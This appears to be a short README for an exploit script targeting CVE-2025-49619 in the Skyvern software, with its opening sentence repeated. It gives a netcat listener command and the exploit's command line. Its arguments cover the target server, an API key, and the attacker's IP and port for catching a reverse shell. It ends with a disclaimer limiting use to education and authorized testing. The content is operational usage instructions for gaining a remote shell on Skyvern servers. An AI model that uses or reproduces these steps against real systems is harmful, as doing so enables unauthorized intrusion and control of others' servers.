
This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.
This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.
nc -lvnp <PORT>
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -k "<X-API-KEY>" -i <LOCAL_IP> -p <PORT>
<TARGET_IP>: Skyvern server IP<TARGET_PORT>: Skyvern server port<X-API-KEY>: Your Skyvern API key (Settings → API Key)<LOCAL_IP>: Your IP to receive the reverse shell<PORT>: Port for the reverse shell (must match your listener)Disclaimer:
This code is for educational and authorized testing purposes only.